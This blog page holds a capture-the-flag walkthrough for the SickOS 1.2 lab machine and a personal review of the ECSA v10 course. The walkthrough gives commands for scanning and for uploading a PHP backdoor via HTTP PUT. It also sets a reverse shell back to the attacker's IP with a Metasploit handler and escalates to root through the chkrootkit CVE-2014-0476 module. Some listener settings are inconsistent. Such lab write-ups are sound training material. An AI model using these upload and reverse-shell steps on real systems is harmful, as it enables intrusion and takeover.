Information Security

SickOS 1.2 Walkthrough

 

SickOS 1.2
This machine can be downloaded from:
Set the Network adapter to NAT if you are using VMware.
Scan for local IP via netdiscover command:
Netdiscover 
IP: 192.168.236.136
It may different in your lab,
1.png
Scan the IP target with nmap as default:
nmap -A -vv -T4  192.168.236.136
2.png
We detect two ports are open 22/tcp and 80/tcp
Scan all TCP ports and for faster usage we can use zenmap:
  • Type zenmap to open zenmap tool
  • Type the IP in target: 192.168.236.136
  • Choose from profile: Intense scan, all TCP ports
As showing in screen shot:
nmap -p 1-65535 -T4 -A -v 192.168.236.136
3.png
Scan all UDP ports
  • Type the IP in target: 192.168.236.136
  • Choose from profile:Intense scan plus UDP
4
We didn’t find useful ports from UDP scan, So we go back to TCP scan.
After we determined the target has 80 port is open so we will browse it.
We run nikto -h to scan the web and detect directory in that host:
    nikto -h 192.168.236.136
5.png
After there is now useful result we run dirbuster with medium word-list
dirubuster to find directories in different tool,
  • Type http://192.168.236.136in the target textfiled.
  • Check Go Faster for speed process.
  • Choose the wordlist in /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt.
  • Click Start
6.png
Then we detect “test” directory let’s open it in browser
Let’s analyze the page and open view source,
nothing useful, So we can analyze the server side command either via burpsuite or via curl command and use OPTIONS to determine web functions are allowed
#curl -v -X OPTIONS http://192.168.236.136/test
7.png
After we detect that PUT command is allowed, we can put our shell either via burpsuite or via Nmap,
Let us generate shell first
I use ready shell in kali by default using:
    locate shell
8.png
Copy shell and rename it as shell.php
    cp /usr/share/webshells/php/php-backdoor.php /root/shell.php
Edit the shell.php via command:
    nano shell.php
9.png
$ip=’192.168.236.135′ 
    >> kali IP
$port 443 
    >> because 4444 isn’t working
nmap -p 80 192.168.236.136 –script http-put –script-args http-put.url=’/test/shell.php’,http-put.file=’shell.php’
10.png
Successfully created!
Now we have to make listener, in two different way nc -lvp 443 or  metasploit but i prefer metasploit for Privilege Escalation later,
We use payload php/reverse_php  because we generate shell no meterpreter and that works for me,
Set local host (kali IP) and port (443) as we did in shell previously.
Then we type exploit (-jz) to work session in background.
msfconsole
use exploit/multi/handler
set payload php/reverse_php
set LHOST192.168.236.136
set LPORT 442
exploit -jz
11.png
Final options:
12.png
Then we move to this shell via browser:
13.png
Finally we got a user shell!
But with normal user www-data
14.png
For Privilege Escalation first we check the current process running and has root privileges:
ls -la
15.png
We saw that linechkrootkit has root privileges,
drwxr-xr-x  2 john john  4096 Apr 12  2016 chkrootkit-0.49
After figure out for vulnerability in Google we discovered:
vulnerability of chkrootkit CVE-2014-0476 this could allow me to escalate my privilge.
with metasploit module.
  • use exploit/unix/local/chkrootkit
  • set session 1
After enter following command as shown in given image to load exploit/unix/local/chkrootkit module then set session 1 and arbitrary lport such a 8080 and run the module.
for me i set session 3 because i already opened sessions 1 and 2.
16.png
Type
>Info
17.png
Make sure about lport with options command:
18.png
Then type run
19.png
session 4 opened ! in my case,
Type id 
To see the privilege account
20.png
Now we are root!
open the 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt text for final flag:
cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
21.png
I Hope you enjoy it!
contact me twitter:
Advertisements
Information Security

ECSA v10 Review

ECSA ( EC-Council Security Analyst) v10 Review:

 

Hi there,

Today I will write about ECSA it’s an advanced penetration testing course (EC-Council Security Analyst),

You can find official website of this course here:

www.eccouncil.org/programs/certified-security-analyst-ecsa/

 

This write-up describes my experience and not necessarily be the all parts. Let’s move to the pre-request of this course:

You need CEH (course and practical course) in the new version 10,
I had CEHv9 on Dec/2017,

The Course:
This course extends your knowledge from just knowing the information and tools to use the information that you learnt in CEH and reuse the tool with some advanced technique.

When you look to the syllabus of ECSA you will see the interesting topics such as cloud hacking, IOT hacking and Database Hacking, Internal and external penetration testing but the truth is different.

The Benefits:

To be honest the gold key in this course is to teach you how to get engaged with security industry and how to apply for Pen Test project and complete all business papers pre and post proposal.

As EC-Council always does, their courses contain a lot of theoretical knowledge comparing to the practical phase and that’s what makes them not good enough to take their courses.

ECSA v10 has 16 modules + 10 of self-study, all of them is just slide show.
If you are looking for just deep information you can enroll it.

The practical section contains a website named iLab,
iLab is a virtual environment has windows (server / 8 / 10) and kaliubuntu – backtrack divided as company departments to apply all the labs.

My Experience:
Ok, for now we learnt all the outline of the course, but we didn’t get my experience and recommendations of ECSA as well,

I am planning to take OSCP but I didn’t feel my PenTest skills as advanced enough after CEH to go for OSCP and that’s why I took ECSA to improve my current Penetration Test experience.

The course, as I mentioned, contains a lot of theoretical information regard to practical,So, if you are looking for Penetration testing practical course you shouldn’t be here.

The course repeats many labs from CEH which is bad for me. I expected more advanced techniques rather than just use old and expired tools and repeat exactly CEH labs and hacking with Metasploit.

To mention some detailed example the Nmap has one more bash script to scan which is new for me and one exploit editing.

The module contains some repeated labs if we investigate cloud you will apply XSS attack than was in web module.
If you look for Database lab you will re-use sql injection but here just to retrieve database table.

I faced a lot of issues in sql labs that does not working. In addition, when I contact lab-support they delayed replying and finally the answer is to forward the issue to the related department and that’s it.

The screenshots and results showing while I’m applying are very different,
In Wi-Fi hacking as we all now, the known scenario to break Access Point or even to penetrate router from outside to get into local network,

But the truth is, making virus for old android devices and then break 4-way hand-shaking but the truth is too far from just WIFI hacking!

In version 10 they removed Report writing and hacking challenges and separated to other course they call it ECSA Practical for commercial reason.

After all I finished the lab and for my first time I am not satisfying with this course, so I don’t recommend any one who need advanced penetration testing course to enroll it.

I only recommend it for the manager or who need just knowledge to work with pen tester not to work penetrate.

When I evaluate the training course they forward all the notes to training center instead to read it and investigate the reason and try to fix it.